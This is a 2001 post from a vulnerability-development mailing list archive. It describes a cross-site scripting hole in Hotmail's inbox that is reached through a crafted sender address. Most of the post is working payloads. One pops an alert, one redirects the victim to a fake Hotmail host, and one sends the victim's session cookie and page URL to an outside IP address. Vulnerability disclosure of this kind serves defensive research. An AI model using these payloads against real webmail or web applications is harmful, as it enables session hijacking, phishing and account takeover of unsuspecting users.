Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

hotmail+javascript

From: ObLiviON <v_arnhem () dds nl>
Date: Mon, 10 Sep 2001 17:27:55 +0200
You can bypass the hotmail javascript 'filtering' system using the
from-address.
I used netscape messenger and set my email address to
"a background=javascript:alert('test') @hotmail.com" (without quotes),
then netscape sends it as "user"@domain.

The from-address is used by hotmail as the name of the cell for the
message link etc.

--> From my hotmail inbox page:

<td name=""a background=javascript:alert('test') "@hotmail.com">

and javascript code is executed.
And its executed on the inbox page=extra fun :)
---

"a background=javascript:location.href='fake.hotmail.bla.com'
@hotmail.com"
"a
background=javascript:document.images[1].src='http://123.12.123.2/cgi-bin/bla.cgi?'+document.cookie+location.href
@hotmail.com"

etc... :)

grtz ObLiviON
Previous By Date Next
Previous By Thread Next

Current thread: